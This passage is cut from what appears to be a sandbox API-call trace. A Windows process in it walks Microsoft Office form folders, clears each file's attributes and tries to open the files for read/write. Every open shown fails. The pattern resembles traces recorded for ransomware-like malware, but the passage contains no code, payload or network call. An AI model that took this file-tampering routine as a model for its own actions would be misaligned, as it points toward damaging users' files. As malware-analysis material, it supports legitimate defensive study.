hTemplateFile=0x0) returned 0xffffffffffffffff [0136.720] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.720] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.720] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.720] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.720] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMAIL.CFG", dwFileAttributes=0x80) returned 0 [0136.721] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMAIL.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\infomail.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.721] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.721] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.721] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.721] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.722] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOML.ICO", dwFileAttributes=0x80) returned 0 [0136.722] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOML.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\infoml.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.722] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.722] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.722] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.722] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.722] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMS.ICO", dwFileAttributes=0x80) returned 0 [0136.722] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\infoms.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.722] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.722] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.722] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.722] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.723] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPM.CFG", dwFileAttributes=0x80) returned 0 [0136.723] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPM.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ipm.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.723] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.723] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.723] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.723] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.723] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPML.ICO", dwFileAttributes=0x80) returned 0 [0136.724] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPML.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ipml.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.724] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.724] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.724] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.724] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.724] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPMS.ICO", dwFileAttributes=0x80) returned 0 [0136.724] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPMS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ipms.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.724] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.724] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.725] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.725] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.725] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSL.ICO", dwFileAttributes=0x80) returned 0 [0136.725] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\mmsl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.725] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.726] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.726] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.726] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.726] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSS.ICO", dwFileAttributes=0x80) returned 0 [0136.726] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\mmss.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.726] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.726] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.726] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.726] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.726] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTE.CFG", dwFileAttributes=0x80) returned 0 [0136.727] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTE.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\note.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.727] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.727] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.727] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.727] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.727] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTEL.ICO", dwFileAttributes=0x80) returned 0 [0136.728] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTEL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\notel.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.728] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.728] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.728] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.728] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.728] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTES.ICO", dwFileAttributes=0x80) returned 0 [0136.728] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTES.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\notes.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.728] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.728] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.728] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.728] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.729] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSMMS.CFG", dwFileAttributes=0x80) returned 0 [0136.729] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSMMS.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\omsmms.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.729] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.729] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.729] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.730] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.731] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSSMS.CFG", dwFileAttributes=0x80) returned 0 [0136.731] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OMSSMS.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\omssms.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.731] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.731] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.731] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.731] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.731] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFL.ICO", dwFileAttributes=0x80) returned 0 [0136.731] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\oofl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.731] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.732] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.732] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.732] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.732] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFS.ICO", dwFileAttributes=0x80) returned 0 [0136.732] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\oofs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.732] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.732] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.732] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.732] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.733] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFTMPL.CFG", dwFileAttributes=0x80) returned 0 [0136.733] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFTMPL.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ooftmpl.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.733] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.733] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.733] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.733] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.734] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POST.CFG", dwFileAttributes=0x80) returned 0 [0136.734] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POST.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\post.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.734] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.734] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.734] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.734] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.734] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTIT.CFG", dwFileAttributes=0x80) returned 0 [0136.735] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTIT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\postit.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.735] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.735] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.736] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.736] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.736] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITL.ICO", dwFileAttributes=0x80) returned 0 [0136.736] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\postitl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.736] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.736] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.736] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.736] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.736] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITS.ICO", dwFileAttributes=0x80) returned 0 [0136.737] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTITS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\postits.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.737] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.737] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.737] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.737] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.737] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTL.ICO", dwFileAttributes=0x80) returned 0 [0136.737] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\postl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.737] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.737] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.737] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.737] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.738] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTS.ICO", dwFileAttributes=0x80) returned 0 [0136.739] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\posts.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.739] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.739] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.739] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.739] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.739] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RCLRPT.CFG", dwFileAttributes=0x80) returned 0 [0136.739] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RCLRPT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rclrpt.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.739] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.739] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.739] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.739] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.740] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REC.CFG", dwFileAttributes=0x80) returned 0 [0136.740] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REC.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rec.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.740] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.740] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.740] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.740] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.740] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECL.ICO", dwFileAttributes=0x80) returned 0 [0136.740] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\recl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.740] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.740] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.741] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.741] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.741] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECS.ICO", dwFileAttributes=0x80) returned 0 [0136.741] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RECS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\recs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.741] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.741] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.742] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.742] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.742] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTE.CFG", dwFileAttributes=0x80) returned 0 [0136.742] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTE.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\remote.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.742] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.742] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.742] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.742] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.742] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTEL.ICO", dwFileAttributes=0x80) returned 0 [0136.742] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTEL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\remotel.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.743] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.743] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.743] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.743] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.743] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTES.ICO", dwFileAttributes=0x80) returned 0 [0136.743] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REMOTES.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\remotes.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.744] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.744] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.744] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.744] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.744] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPLTMPL.CFG", 